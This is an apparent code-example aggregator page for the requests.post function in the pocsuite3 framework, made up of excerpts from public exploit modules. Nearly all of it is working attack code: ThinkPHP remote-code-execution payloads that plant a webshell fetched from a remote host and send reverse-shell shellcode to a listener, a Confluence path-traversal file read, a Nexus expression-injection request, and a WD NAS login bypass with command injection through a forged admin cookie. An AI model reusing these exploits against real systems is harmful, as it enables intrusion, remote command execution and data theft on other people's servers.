How to use the pocsuite3.api.requests.post function in pocsuite3

To help you get started, we’ve selected a few pocsuite3 examples, based on popular ways it is used in public projects.

Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.

github knownsec / pocsuite3 / pocsuite3 / pocs / thinkphp_rce2.py View on Github external
def _attack(self):
        result = {}
        filename = random_str(6) + ".php"
        shell_addr = "http://pocsuite.org/include_files/php_attack.txt"
        payload = "/index.php?s=captcha&Test=print_r(file_put_contents(%27{filename}%27,file_get_contents(%27{url}%27)))".format(
            filename=filename,
            url=shell_addr)
        vul_url = self.url + payload
        headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }
        data = "_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=print_r(file_put_contents(%27{filename}%27,file_get_contents(%27{url}%27)))".format(
            filename=filename,
            url=shell_addr
        )
        requests.post(vul_url, data=data, headers=headers)
        r = requests.post(self.url + "/" + filename, data="c=phpinfo();", headers=headers)
        if r.status_code == 200 and "PHP Extension Build" in r.text:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url + "/" + filename
            result['ShellInfo']['Content'] = shell_addr
        return self.parse_output(result)
github knownsec / pocsuite3 / pocsuite3 / pocs / thinkphp_rce2.py View on Github external
vulurl = self.url + "/index.php?s=captcha"
        # 生成写入文件的shellcode
        _list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(),
                                        os_target=OS.LINUX,
                                        os_target_arch=OS_ARCH.X86)
        for i in _list:
            data = {
                '_method': '__construct',
                'filter[]': 'system',
                'method': 'get',
                'server[REQUEST_METHOD]': i
            }
            headers = {
                "Content-Type": "application/x-www-form-urlencoded"
            }
            requests.post(vulurl, data=data, headers=headers)
github knownsec / pocsuite3 / pocsuite3 / pocs / thinkphp_rce2.py View on Github external
def _check(self, url):
        flag = 'PHP Extension Build'
        data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"

        payloads = [
            r"/index.php?s=captcha"
        ]
        for payload in payloads:
            vul_url = url + payload
            headers = {
                "Content-Type": "application/x-www-form-urlencoded"
            }
            r = requests.post(vul_url, data=data, headers=headers)

            if flag in r.text:
                return payload, data
        return False
github knownsec / pocsuite3 / pocsuite3 / pocs / 20190404_WEB_Confluence_path_traversal.py View on Github external
def _verify(self):
        result = {}
        filename = "../web.xml"
        limitSize = 1000

        paylaod = self.url + "/rest/tinymce/1/macro/preview"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
            "Referer": self.url + "/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
            "Content-Type": "application/json; charset=utf-8"
        }
        data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
        r = requests.post(paylaod, data=data, headers=headers)

        if r.status_code == 200 and "" in r.text:
            m = re.search('', r.text)
            if m:
                content = m.group()[:limitSize]
                result['FileInfo'] = {}
                result['FileInfo']['Filename'] = filename
                result['FileInfo']['Content'] = content

        return self.parse_output(result)
github shadowsock5 / Poc / nexes-manager / CVE-2020-10204.py View on Github external
"firstName": "77",
                        "lastName": "ss",
                        "password": "password",
                        "email": "77@qq.com",
                        "status": "active",
                        "roles": [
                            "$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
                        ]
                    }
                ],
            "type":"rpc","tid":4}
        
        try:
            self.headers.update(self.auth())
            print(self.headers)
            resp = req.post(target_url, json=j, headers=self.headers, proxies=self.proxies)
        except Exception as e:
            e.printStackTrace()
        

        if self.test_EL(resp):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)
github knownsec / pocsuite3 / pocsuite3 / pocs / wd_nas_login_bypass_rce.py View on Github external
def _shell(self):
        veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
        veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
        cmd = self.get_option("command")
        data = "';{};'".format(cmd)
        headers = {'cookie': 'isAdmin=1;username=admin'}
        try:
            requests.get(veri_url1)
            requests.post(veri_url2, data=data, headers=headers)
        except Exception as e:
            logger.warn(str(e))